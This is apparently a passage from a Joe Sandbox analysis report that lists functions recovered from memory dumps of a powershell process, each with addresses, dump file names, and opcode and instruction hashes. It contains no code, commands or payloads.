                                                                                                                                                                                      • Instruction Fuzzy Hash: 7702E775A05219DFDB15CFA8C494AAEBBB2FF88310F248159E845AB361D731ED81CF90
                                                                                                                                                                                      Function 0766452D Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f032edfd95a5e78a8e9741919a9ffe30346cdf29e40b7ad95afafb66e7b410ce
                                                                                                                                                                                      • Instruction ID: 191fafa262544f9b4baf447bb0980bf14838bbba6ffd28f347409e4972082d77
                                                                                                                                                                                      • Opcode Fuzzy Hash: f032edfd95a5e78a8e9741919a9ffe30346cdf29e40b7ad95afafb66e7b410ce
                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF16DB4A01285AFDB14CFA4C444FA9BBB2EF89714F54C059E906AB355CB72ED42CF90
                                                                                                                                                                                      Function 093A0800 Relevance: .3, Instructions: 344COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 50624fdd64b70450faa4849f4b3d895ccad8f21ab0cc185c45c0d14d0bc38a9a
                                                                                                                                                                                      • Instruction ID: d58958a363482d06c1284e24aa968da204febbb6fa3f75c690f420031b97dedb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 50624fdd64b70450faa4849f4b3d895ccad8f21ab0cc185c45c0d14d0bc38a9a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E1F875A01209EFDB19CF98D594AADBBB2FF89314F248159E805AB361C731ED81CF90
                                                                                                                                                                                      Function 0766C862 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: e5208bedc408a9b6008d7708a9a9294c46ddc32f1b1fa9c6cd27decb8f3f0473
                                                                                                                                                                                      • Instruction ID: ab996246a4086c49b10accec3d09bea166a6407e37252fdf404bdee541e590fd
                                                                                                                                                                                      • Opcode Fuzzy Hash: e5208bedc408a9b6008d7708a9a9294c46ddc32f1b1fa9c6cd27decb8f3f0473
                                                                                                                                                                                      • Instruction Fuzzy Hash: C1E171B4A10215DFDB24CB64C854BEABBB2BF8A310F508199D5496F741CB72ED81CFA1
                                                                                                                                                                                      Function 07667378 Relevance: .3, Instructions: 289COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7d318f5c37210919f3d533453c114dc2416002fc557509a2a38d24cbd39936d8
                                                                                                                                                                                      • Instruction ID: 55db1622d18e94e46f1ea393c9f50104ea8a9e9d2f22813613a353b64e1c86da
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d318f5c37210919f3d533453c114dc2416002fc557509a2a38d24cbd39936d8
                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B18DB4A00205DFDB14CFA8C454BAEBBB2AF89718F65C059D9066F355CB71EC82CB91
                                                                                                                                                                                      Function 093B01C8 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530563707.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93b0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ad9055e1cf171b21f7399419ae2a648212208534de91c3095039c9a5755d8eb7
                                                                                                                                                                                      • Instruction ID: 4132c133cc40602097d61f8ca72ca4d1dd926f24d39facae2738405e8338126a
                                                                                                                                                                                      • Opcode Fuzzy Hash: ad9055e1cf171b21f7399419ae2a648212208534de91c3095039c9a5755d8eb7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A912E74A00214DFDB18CF94C455AAEBBB2AF89314F158069EA09AFB55CB72DC81CF61
                                                                                                                                                                                      Function 076689A8 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0b1f25fdc0603332d424d8b77c4359364eec8b314a6ae102b2fe274f3fb8da2a
                                                                                                                                                                                      • Instruction ID: a985f972f9b5efde83cba45c708ff2a69adf3531d3db8cf1364c0dcd61c30d90
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b1f25fdc0603332d424d8b77c4359364eec8b314a6ae102b2fe274f3fb8da2a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A7126F1700347DFCB109F7984052BABBA1AF85250F54847AD956DB781DB31D942CBA1
                                                                                                                                                                                      Function 093A0448 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 88b22df1a34dc6131bb93bfbfd92c5a5647e93e7814d7d8e26345b286b900eac
                                                                                                                                                                                      • Instruction ID: 195325652165c6017b49c5cf80c86246c15ee4b8fffef28117a341cf50bc8fae
                                                                                                                                                                                      • Opcode Fuzzy Hash: 88b22df1a34dc6131bb93bfbfd92c5a5647e93e7814d7d8e26345b286b900eac
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F816E31B002068FDB14DFA9D850AAEB7F2FFC9314F148569E405AB365DB35AC46CBA0
                                                                                                                                                                                      Function 093B01BE Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530563707.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93b0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 528ad06ec9077691c566e86b0dd154df43beeb45ae4194a853c6c3a61fe5e77b
                                                                                                                                                                                      • Instruction ID: d01a3cc8d89419ccb5f3fe694e7036e64a7a0345fa5a7211ed9a8739c1f67602
                                                                                                                                                                                      • Opcode Fuzzy Hash: 528ad06ec9077691c566e86b0dd154df43beeb45ae4194a853c6c3a61fe5e77b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 97812C74A00204DFDB18CF94C594AEEBBB2AF89314F148059E909AFB55CB32DC81CF61
                                                                                                                                                                                      Function 07663F88 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 21fa09e9c32de84d56105afdd6cb82fe94a052a7a9accfe29adb4e11ee86fe47
                                                                                                                                                                                      • Instruction ID: 196e9b2ff2359ef16f8bb282e32135e94837fa2efd737e2bf4ed9562ae05bbc4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 21fa09e9c32de84d56105afdd6cb82fe94a052a7a9accfe29adb4e11ee86fe47
                                                                                                                                                                                      • Instruction Fuzzy Hash: B85158B17043969FDB229BB98808776FFA6DFD6211F18806BD556CB341CE31C945C3A2
                                                                                                                                                                                      Function 093A2631 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: edab0a2923aa4ee9e9811da7639b3f4fb1546ed743e39de20343d0db5d7ba52e
                                                                                                                                                                                      • Instruction ID: f437152340e968867bbac0856e0a5f579f27b28a5d7ec1312a9a4ae121aacb34
                                                                                                                                                                                      • Opcode Fuzzy Hash: edab0a2923aa4ee9e9811da7639b3f4fb1546ed743e39de20343d0db5d7ba52e
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC518334A05645CFCB06CF58C894AAEBBB2FF49310B258199E965EB3A6C335ED41CF50
                                                                                                                                                                                      Function 0766FCC4 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 28bf5545b74497cf001d09a67d7f69c6818be5303275f6d94cab17d233c75bd7
                                                                                                                                                                                      • Instruction ID: 523b929130064496e450e34f027f62670f891a42986472ff567268955054f4ba
                                                                                                                                                                                      • Opcode Fuzzy Hash: 28bf5545b74497cf001d09a67d7f69c6818be5303275f6d94cab17d233c75bd7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B411CB5B00206ABDB249A79A4143FA7BD29FC5610F54447FC612DB345EF35DC42C7A1
                                                                                                                                                                                      Function 07662051 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6944bf84734115a67065cabde6b7b74f302aa22e8662732fa44e48eb723f3c52
                                                                                                                                                                                      • Instruction ID: 06b3b57be812e127854451fc356a0c5a53c8e6671c0ad946828610ad9c9e2fc0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6944bf84734115a67065cabde6b7b74f302aa22e8662732fa44e48eb723f3c52
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A414BF0604342DFCB158F748925AB5BBA3BF85390F544096D9069F352C731CD85CBA2
                                                                                                                                                                                      Function 07663E00 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5f4273d1faf60c873c998e0a4846ae69c67ea2de462a148f6ca215e704ebf9f9
                                                                                                                                                                                      • Instruction ID: 0d32f44359b66cd7fa9c8ef2b50b44d356b4629a11e047197fd937ea054c9bb8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f4273d1faf60c873c998e0a4846ae69c67ea2de462a148f6ca215e704ebf9f9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 69413AB6B002169BDB249EBAC8446AAF7B1EFC4610B54816BC916EB341DF31DE05C7E1
                                                                                                                                                                                      Function 093A1111 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 81353bb8ee62266fc99779cd72575e651818182b37a5a82d5c2178b2694c0c7b
                                                                                                                                                                                      • Instruction ID: 2403e8a46cf640c2c8f3c4ab2446b80485be2783c1efa90a2ea92c0efbd8abee
                                                                                                                                                                                      • Opcode Fuzzy Hash: 81353bb8ee62266fc99779cd72575e651818182b37a5a82d5c2178b2694c0c7b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F410734A152099FCB15CF98C9849AEB7B2FF88324F248658E915EB394D335ED41CF50
                                                                                                                                                                                      Function 093A20B2 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 991c4b401707170b94bdaa00e416468857081821e779d8eb60e22e88a47ae1e1
                                                                                                                                                                                      • Instruction ID: 4070c7440c3c32385968e66294db951b896e58c4bfefc74dfd7bee955ac12ab2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 991c4b401707170b94bdaa00e416468857081821e779d8eb60e22e88a47ae1e1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D41E974A015099FCB15CF9CC994AAEBBB2FF88310B258258E915EB3A5C735EC51CF50
                                                                                                                                                                                      Function 093A16D7 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c28f5fd05fa96f730af004f1b7b97ac9a41966110faf8152da22319862582878
                                                                                                                                                                                      • Instruction ID: 55694219ec983fb6c03e026ea8a4a018525afe012fc94ce2570c7fcfffdc3022
                                                                                                                                                                                      • Opcode Fuzzy Hash: c28f5fd05fa96f730af004f1b7b97ac9a41966110faf8152da22319862582878
                                                                                                                                                                                      • Instruction Fuzzy Hash: 92411A74A11109DFCB05CF98C9849AEBBF2FF88320B248259E915AB3A4D731AC51CF94
                                                                                                                                                                                      Function 07667818 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 99e9d40df017fd7b6c034872660996a6d46be8c64cc4b3c8ee489431a2a676d6
                                                                                                                                                                                      • Instruction ID: c83a2389601c928b3357129f5dc56ba9553fb19b9a49dbcead608c8723a341a6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 99e9d40df017fd7b6c034872660996a6d46be8c64cc4b3c8ee489431a2a676d6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D3173B8B40214ABE7049BA4C854FEE77A39FC5754F648058E9017F781CF76AC828BA1
                                                                                                                                                                                      Function 093A07F0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: e6bb6b0e95ec1689032a27c3d9e13d3f22d7ebc04768751b1821f4dc41a5eb1c
                                                                                                                                                                                      • Instruction ID: b2556cb059baf3a7aca57d2b290b0d35ff7368e6425db6ab8ad578105a6ccf24
                                                                                                                                                                                      • Opcode Fuzzy Hash: e6bb6b0e95ec1689032a27c3d9e13d3f22d7ebc04768751b1821f4dc41a5eb1c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 12313875A01209DFCB19CF58C5909AAFBB2FF89320B258299E559EB752C331EC41CF94
                                                                                                                                                                                      Function 07663DE1 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: befc977e4a5a26ea344d943e91e2d5069fdd3403ab6387c5504a3a309acc0eff
                                                                                                                                                                                      • Instruction ID: 789413cb7465f7e0d234231cf955b690ee44f5e2d05f7eb4501376b540246f6c
                                                                                                                                                                                      • Opcode Fuzzy Hash: befc977e4a5a26ea344d943e91e2d5069fdd3403ab6387c5504a3a309acc0eff
                                                                                                                                                                                      • Instruction Fuzzy Hash: 792136BAA047569FCB219F3AC9041A6FBB1EF4A620B594197C80ADB342E730DD45C7F1
                                                                                                                                                                                      Function 07668989 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: a3d47349f73d78935ca73ff700bf0d2b1550ec7f48c39f094fd26a83452e1dbf
                                                                                                                                                                                      • Instruction ID: d4e8cdd270ba3bfe1a89ad7636c7c04f6a7406e47d7f794402f185c29e63bbf8
                                                                                                                                                                                      • Opcode Fuzzy Hash: a3d47349f73d78935ca73ff700bf0d2b1550ec7f48c39f094fd26a83452e1dbf
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF216BB0A043429FCB109F7484093757FA19F85350F4840AAD946DFB92DB36D9C1CBA2
                                                                                                                                                                                      Function 093B21E8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530563707.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93b0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 95c632e25875085720a8b9ce39afa43b9c1ae046a353788613c7e65a69992ec1
                                                                                                                                                                                      • Instruction ID: 9846645a9d0c462d55202d1e4b965b844af8c439400f8d3360379e228ca81de1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 95c632e25875085720a8b9ce39afa43b9c1ae046a353788613c7e65a69992ec1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68218E32B041098FDB6999A4E8511EFF7A5BBE9210F10827FC771CF982CA32C416CB52
                                                                                                                                                                                      Function 093A0438 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 04d655a6847223ea20a3ae989107fb2571b9b43e945b85a61f2bfb042ced7ab6
                                                                                                                                                                                      • Instruction ID: 202401192efa90451bd8d123b8277117bf5362316641ad0cae056d89840d6210
                                                                                                                                                                                      • Opcode Fuzzy Hash: 04d655a6847223ea20a3ae989107fb2571b9b43e945b85a61f2bfb042ced7ab6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 31F02E31E041499FDB10E799E8449EEBB74FF41360F5080E9D4049B751D7345C05CFA1